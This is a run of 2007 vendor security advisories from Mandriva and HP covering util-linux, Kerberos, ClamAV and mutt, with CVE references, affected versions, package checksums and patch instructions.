-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:111 http://www.mandriva.com/security/ ___ Package : util-linux Date: June 4, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: login in util-linux-2.12a (and later versions) skips pam_acct_mgmt and chauth_tok when authentication is skipped, such as when a Kerberos krlogin session has been established, which might allow users to bypass intended access policies that would be enforced by pam_acct_mgmt and chauth_tok. Updated packages have been patched to address this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7108 ___ Updated Packages: Mandriva Linux 2007.0: c6ccfda3e51f799be58d347a6252fc0d 2007.0/i586/losetup-2.12r-8.2mdv2007.0.i586.rpm 00677b03b96e27a2e04b1614cd717821 2007.0/i586/mount-2.12r-8.2mdv2007.0.i586.rpm be40a7e5880fc2f2734aced382b973bf 2007.0/i586/util-linux-2.12r-8.2mdv2007.0.i586.rpm a191a26c8a8bf8e09f9c2ed0f1355f45 2007.0/SRPMS/util-linux-2.12r-8.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 3af6dbd097cd5f76876aaab20d0a460c 2007.0/x86_64/losetup-2.12r-8.2mdv2007.0.x86_64.rpm 944ba5000fbe19ff0aec7f7cb5e95f3b 2007.0/x86_64/mount-2.12r-8.2mdv2007.0.x86_64.rpm 8a9f34e7452785cb1b99428f4aa3e1c6 2007.0/x86_64/util-linux-2.12r-8.2mdv2007.0.x86_64.rpm a191a26c8a8bf8e09f9c2ed0f1355f45 2007.0/SRPMS/util-linux-2.12r-8.2mdv2007.0.src.rpm Mandriva Linux 2007.1: dac84f6fd34e6390bf8895f499ea14c9 2007.1/i586/losetup-2.12r-12.1mdv2007.1.i586.rpm 6d8c238a5c8ab87221946cd2eea65b7e 2007.1/i586/mount-2.12r-12.1mdv2007.1.i586.rpm c590331e6d863b2da097a0ce84dc1e6e 2007.1/i586/util-linux-2.12r-12.1mdv2007.1.i586.rpm ed6995fcf07fe3e8a45c7cf168ef4b9e 2007.1/SRPMS/util-linux-2.12r-12.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: a5164c59195655944cfa8a0b091954e5 2007.1/x86_64/losetup-2.12r-12.1mdv2007.1.x86_64.rpm 3b45cf9ba0a237f8102fe5b18fb287ea 2007.1/x86_64/mount-2.12r-12.1mdv2007.1.x86_64.rpm c7643e7ccd4d6d6db7a8ec5a64c0abc3 2007.1/x86_64/util-linux-2.12r-12.1mdv2007.1.x86_64.rpm ed6995fcf07fe3e8a45c7cf168ef4b9e 2007.1/SRPMS/util-linux-2.12r-12.1mdv2007.1.src.rpm Corporate 3.0: aeea368d87973112f486157eb8e7a392 corporate/3.0/i586/losetup-2.12-2.2.C30mdk.i586.rpm 5368318cb1d78cfe55ab380fbb892e35 corporate/3.0/i586/mount-2.12-2.2.C30mdk.i586.rpm 9823ba9ec1c0aa6cdcd8400adfae4067 corporate/3.0/i586/util-linux-2.12-2.2.C30mdk.i586.rpm 61dce5786fb8fcf8d47866a2f5ccac73 corporate/3.0/SRPMS/util-linux-2.12-2.2.C30mdk.src.rpm Corporate 3.0/X86_64: 303222d2782ec741d3eec97393d24934 corporate/3.0/x86_64/losetup-2.12-2.2.C30mdk.x86_64.rpm 92952fcf2df3456c4c45378cd5c9d35d corporate/3.0/x86_64/mount-2.12-2.2.C30mdk.x86_64.rpm 394783ba574f715de60eb916656d08bf corporate/3.0/x86_64/util-linux-2.12-2.2.C30mdk.x86_64.rpm 61dce5786fb8fcf8d47866a2f5ccac73 corporate/3.0/SRPMS/util-linux-2.12-2.2.C30mdk.src.rpm Corporate 4.0: ef4ae1050f3db1223833665beaabc8b0 corporate/4.0/i586/losetup-2.12q-7.2.20060mlcs4.i586.rpm a8d6eab630efed0f6fc762f187868698 corporate/4.0/i586/mount-2.12q-7.2.20060mlcs4.i586.rpm a8fc8381718430bd75de652b11f39ae1 corporate/4.0/i586/util-linux-2.12q-7.2.20060mlcs4.i586.rpm 8f216edaf80c4320b27b0e4e4f93b78a corporate/4.0/SRPMS/util-linux-2.12q-7.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 3aeec0f637c8e7ed452af857320c4eda corporate/4.0/x86_64/losetup-2.12q-7.2.20060mlcs4.x86_64.rpm 17dddbe7a339f5d0f97fc555fe945016 corporate/4.0/x86_64/mount-2.12q-7.2.20060mlcs4.x86_64.rpm 44fb996e88d86b74403e6a79f3a247fb corporate/4.0/x86_64/util-linux-2.12q-7.2.20060mlcs4.x86_64.rpm 8f216edaf80c4320b27b0e4e4f93b78a corporate/4.0/SRPMS/util-linux-2.12q-7.2.20060mlcs4.src.rpm Multi Network Firewall 2.0: 6c6ee8df170f2045a0be93cf8941280b mnf/2.0/i586/losetup-2.12-2.2.M20mdk.i586.rpm cf8a60bb88115e6f4d3076b5a1df50e5 mnf/2.0/i586/mount-2.12-2.2.M20mdk.i586.rpm 298e9d5915b752d32c8824c986ba8276 mnf/2.0/i586/util-linux-2.12-2.2.M20mdk.i586.rpm d81106fb4614aab0ce85aac38b5c8231 mnf/2.0/SRPMS/util-linux-2.12-2.2.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
[security bulletin] HPSBUX02217 SSRT071337 rev.2 - HP-UX running Kerberos, Remote Arbitrary Code Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01056923 Version: 2 HPSBUX02217 SSRT071337 rev.2 - HP-UX running Kerberos, Remote Arbitrary Code Execution NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-05-15 Last Updated: 2007-05-25 Potential Security Impact: Remote arbitrary code execution Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified on HP-UX running Kerberos. The vulnerability could be exploited by remote authorized users to execute arbitrary code. References: CVE-2007-1216 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running the Kerberos Client software versions 1.3.5.05 and previous. BACKGROUND To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed. AFFECTED VERSIONS HP-UX B.11.11 = krb5client.KRB5-64SLIB-A krb5client.KRB5-E-A-MAN-A krb5client.KRB5-J-E-MAN-A krb5client.KRB5-J-S-MAN-A krb5client.KRB5-PRG-A krb5client.KRB5-RUN-A krb5client.KRB5-SHLIB-A action: install revision C.1.3.5.06 or subsequent KRB5-Client.KRB5-SHLIB KRB5-Client.KRB5-PRG KRB5-Client.KRB5-RUN KRB5-Client.KRB5-ENG-A-MAN KRB5-Client.KRB5-JPN-E-MAN KRB5-Client.KRB5-JPN-S-MAN KRB5-Client.KRB5-64SLIB action: install PHSS_36286 or subsequent HP-UX B.11.23 = krb5client.KRB5-64SLIB-A krb5client.KRB5-E-A-MAN-A krb5client.KRB5-J-E-MAN-A krb5client.KRB5-J-S-MAN-A krb5client.KRB5-PRG-A krb5client.KRB5-RUN-A krb5client.KRB5-SHLIB-A krb5client.KRB5IA32SLIB-A krb5client.KRB5IA64SLIB-A action: install revision D.1.3.5.06 or subsequent KRB5-Client.KRB5-64SLIB KRB5-Client.KRB5-ENG-A-MAN KRB5-Client.KRB5-IA32SLIB KRB5-Client.KRB5-IA64SLIB KRB5-Client.KRB5-JPN-E-MAN KRB5-Client.KRB5-JPN-S-MAN KRB5-Client.KRB5-PRG KRB5-Client.KRB5-RUN KRB5-Client.KRB5-SHLIB action: install PHSS_34991 or subsequent HP-UX B.11.31 = KRB5-Client.KRB5-64SLIB KRB5-Client.KRB5-IA32SLIB KRB5-Client.KRB5-IA64SLIB KRB5-Client.KRB5-SHLIB KRB5-Client.KRB5-64SLIB KRB5-Client.KRB5-SHLIB action: install PHSS_36361 or subsequent END AFFECTED VERSIONS RESOLUTION HP has made the following patches and software updates available to resolve the vulnerability: B.11.11 PHSS_36286 or Kerberos Client C.1.3.5.06 or subsequent B.11.23 PHSS_34991 or Kerberos Client D.1.3.5.06 or subsequent B.11.31 PHSS_36361 or subsequent These software updates are available on: http://www.hp.com/go/softwaredepot/ The patches are available on: http://itrc.hp.com MANUAL ACTIONS: Yes - Update PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY Version: 1 (rev.1) - 21 May 2007 Initial release Version: 2 (rev.2) - 29 May 2007 Corrected typo in Reference Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is
[ MDKSA-2007:115 ] - Updated clamav packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:115 http://www.mandriva.com/security/ ___ Package : clamav Date: June 4, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A vulnerability in the OLE2 parser in ClamAV was found that could allow a remote attacker to cause a denial of service via resource consumption with a carefully crafted OLE2 file. Other vulnerabilities and bugs have also been corrected in 0.90.3 which is being provided with this update. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2650 ___ Updated Packages: Mandriva Linux 2007.0: 8f807a16b18ddd17fdcbbf563f0b225c 2007.0/i586/clamav-0.90.3-0.1mdv2007.0.i586.rpm afcb2de5f26cc1fc07499cea6e5f4ffd 2007.0/i586/clamav-db-0.90.3-0.1mdv2007.0.i586.rpm 3ea7af875ea79a1efb2aec03e4e70e7e 2007.0/i586/clamav-milter-0.90.3-0.1mdv2007.0.i586.rpm 498a8e05cb31451382562c22dd8c6ca8 2007.0/i586/clamd-0.90.3-0.1mdv2007.0.i586.rpm 90cecf4adbf717672b54e5a18250447d 2007.0/i586/clamdmon-0.90.3-0.1mdv2007.0.i586.rpm 4c2b036b761d67aef27349f3bf6de11d 2007.0/i586/libclamav2-0.90.3-0.1mdv2007.0.i586.rpm 667c354d70642e8663edd469506fb488 2007.0/i586/libclamav2-devel-0.90.3-0.1mdv2007.0.i586.rpm e472e368da522072b20a7773f4db5d22 2007.0/SRPMS/clamav-0.90.3-0.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 15636a6d8f3fd6537350b0a1b67741c3 2007.0/x86_64/clamav-0.90.3-0.1mdv2007.0.x86_64.rpm 097ede19d694a7f2d8d103bd16f9864b 2007.0/x86_64/clamav-db-0.90.3-0.1mdv2007.0.x86_64.rpm 68ebe1e39a0b25211e6c9dbeddcdefa6 2007.0/x86_64/clamav-milter-0.90.3-0.1mdv2007.0.x86_64.rpm f0bd264bfdadc816759a438308b82cd7 2007.0/x86_64/clamd-0.90.3-0.1mdv2007.0.x86_64.rpm 30b6eb173aa40c39b6cd191433387a26 2007.0/x86_64/clamdmon-0.90.3-0.1mdv2007.0.x86_64.rpm 5164562d6affcacc64ade14d3acd23cd 2007.0/x86_64/lib64clamav2-0.90.3-0.1mdv2007.0.x86_64.rpm b86a1162638401a101a08b52689df150 2007.0/x86_64/lib64clamav2-devel-0.90.3-0.1mdv2007.0.x86_64.rpm e472e368da522072b20a7773f4db5d22 2007.0/SRPMS/clamav-0.90.3-0.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 378ad782e37e018e1e553d7c351ea358 2007.1/i586/clamav-0.90.3-0.1mdv2007.1.i586.rpm d083214002090ae15d36c9463c78c29c 2007.1/i586/clamav-db-0.90.3-0.1mdv2007.1.i586.rpm 5316d47473a5c284f40fdb21c08b9d28 2007.1/i586/clamav-milter-0.90.3-0.1mdv2007.1.i586.rpm ff430af11f2ba37bbcb521f93d71030a 2007.1/i586/clamd-0.90.3-0.1mdv2007.1.i586.rpm ab9cac6d55dc192b5ffcaa5f356f6821 2007.1/i586/clamdmon-0.90.3-0.1mdv2007.1.i586.rpm 06daf5c409b7931ca02e88f85048225a 2007.1/i586/libclamav2-0.90.3-0.1mdv2007.1.i586.rpm eb59ec3314ae85a0a2c400d725c1d984 2007.1/i586/libclamav2-devel-0.90.3-0.1mdv2007.1.i586.rpm 22132cc15d14520edd635019d06b874e 2007.1/SRPMS/clamav-0.90.3-0.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 03d79b409aa5c87570222a600ac92915 2007.1/x86_64/clamav-0.90.3-0.1mdv2007.1.x86_64.rpm 7cb3f180fa1bfc6cdaae4a7ae4088dc2 2007.1/x86_64/clamav-db-0.90.3-0.1mdv2007.1.x86_64.rpm 850deaafd4bb64b4c6a35772fffbd369 2007.1/x86_64/clamav-milter-0.90.3-0.1mdv2007.1.x86_64.rpm 9f3e3f88497ce3b769f5f6f7e05fd8ca 2007.1/x86_64/clamd-0.90.3-0.1mdv2007.1.x86_64.rpm 6f38934bee43286ecf2b8f7049c6dd1f 2007.1/x86_64/clamdmon-0.90.3-0.1mdv2007.1.x86_64.rpm 94f315377e8f33b936fff253eaa4e847 2007.1/x86_64/lib64clamav2-0.90.3-0.1mdv2007.1.x86_64.rpm c7c1458f005b09c23bb2affb7b9aae0c 2007.1/x86_64/lib64clamav2-devel-0.90.3-0.1mdv2007.1.x86_64.rpm 22132cc15d14520edd635019d06b874e 2007.1/SRPMS/clamav-0.90.3-0.1mdv2007.1.src.rpm Corporate 3.0: d173ea9451a336aa56e834f1cd3d4882 corporate/3.0/i586/clamav-0.90.3-0.1.C30mdk.i586.rpm 2694fbbd622a5b312a523bc16993ff1c corporate/3.0/i586/clamav-db-0.90.3-0.1.C30mdk.i586.rpm 647afdc7fcec85cc9190e2680b35000c corporate/3.0/i586/clamav-milter-0.90.3-0.1.C30mdk.i586.rpm 2646c5e3f81c8d0b35229205bbba5344 corporate/3.0/i586/clamd-0.90.3-0.1.C30mdk.i586.rpm bfd73b522c6d7cda7e7dd995a6e7e79b corporate/3.0/i586/clamdmon-0.90.3-0.1.C30mdk.i586.rpm aeca41b4f44f1f7ccbee306816f34259 corporate/3.0/i586/libclamav2-0.90.3-0.1.C30mdk.i586.rpm 78e8398b8f4b8663b0a0684acd6bd938 corporate/3.0/i586/libclamav2-devel-0.90.3-0.1.C30mdk.i586.rpm 3bdca91be114543785b82ff8da904c16 corporate/3.0/SRPMS/clamav-0.90.3-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: 9d3ee2af6dbb5595bdbb1db33344bda5 corporate/3.0/x86_64/clamav-0.90.3-0.1.C30mdk.x86_64.rpm 22b70bcf86a90f84702f722a5eb5dbf1 corporate/3.0/x86_64/clamav-db-0.90.3-0.1.C30mdk.x86_64.rpm 6b9e3874400f14173
[ MDKSA-2007:113 ] - Updated mutt packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:113 http://www.mandriva.com/security/ ___ Package : mutt Date: June 4, 2007 Affected: 2007.0, 2007.1, Corporate 3.0 ___ Problem Description: A flaw in the way mutt processed certain APOP authentication requests was discovered. By sending certain responses when mutt attempted to authenticate again an APOP server, a remote attacker could possibly obtain certain portions of the user's authentication credentials (CVE-2007-1558). A flaw in how mutt handled certain characters in gecos fields could lead to a buffer overflow. A local user able to give themselves a carefully crafted Real Name could potentially execute arbitrary code if a victim used mutt to expand the attacker's alias (CVE-2007-2683). Updated packages have been patched to address these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1558 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2683 ___ Updated Packages: Mandriva Linux 2007.0: b43721e2b31820fd9f5812d5d2ea7709 2007.0/i586/mutt-1.5.11-5.2mdv2007.0.i586.rpm 0a2ecfcd4950075f788a68c16e6a513d 2007.0/i586/mutt-utf8-1.5.11-5.2mdv2007.0.i586.rpm cb6ce601ab9f3542afcacb09614a4ebd 2007.0/SRPMS/mutt-1.5.11-5.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 3c26410f2cbed87435c86122095994e0 2007.0/x86_64/mutt-1.5.11-5.2mdv2007.0.x86_64.rpm c8a815d5f8de4cf548084bbcb0cc4957 2007.0/x86_64/mutt-utf8-1.5.11-5.2mdv2007.0.x86_64.rpm cb6ce601ab9f3542afcacb09614a4ebd 2007.0/SRPMS/mutt-1.5.11-5.2mdv2007.0.src.rpm Mandriva Linux 2007.1: 9c4ced2eba202a4f2670d6986ba12d4a 2007.1/i586/mutt-1.5.14-1.1mdv2007.1.i586.rpm f6db8984bf23a3dfb38ac0aa50fc521f 2007.1/i586/mutt-utf8-1.5.14-1.1mdv2007.1.i586.rpm 4d192718f3b9b508492f6e686e96c27b 2007.1/SRPMS/mutt-1.5.14-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 55ddf6e16f45e7d206279c207c51725a 2007.1/x86_64/mutt-1.5.14-1.1mdv2007.1.x86_64.rpm 980c4db7c94c05cf53329b085b0d44d8 2007.1/x86_64/mutt-utf8-1.5.14-1.1mdv2007.1.x86_64.rpm 4d192718f3b9b508492f6e686e96c27b 2007.1/SRPMS/mutt-1.5.14-1.1mdv2007.1.src.rpm Corporate 3.0: 04fc719b9625069d10f3d8fc8234d0e2 corporate/3.0/i586/mutt-1.5.5.1i-2.3.C30mdk.i586.rpm e8edc6bc6d2726c87841c26140293f3a corporate/3.0/i586/mutt-utf8-1.5.5.1i-2.3.C30mdk.i586.rpm a7a4c85f414451f966598bf5ac39e86f corporate/3.0/SRPMS/mutt-1.5.5.1i-2.3.C30mdk.src.rpm Corporate 3.0/X86_64: 07e8da602972a500108a15dc6e751ebd corporate/3.0/x86_64/mutt-1.5.5.1i-2.3.C30mdk.x86_64.rpm 3f7729407df0c9037c5514c3f9b746fe corporate/3.0/x86_64/mutt-utf8-1.5.5.1i-2.3.C30mdk.x86_64.rpm a7a4c85f414451f966598bf5ac39e86f corporate/3.0/SRPMS/mutt-1.5.5.1i-2.3.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGZGyEmqjQ0CJFipgRAmbzAJ9yRBNSbbCia14nCDN9bV46xKuB0ACgntnI twlTs6PCF7+DZjIxwiHF+Yw= =hwYt -END PGP SIGNATURE-
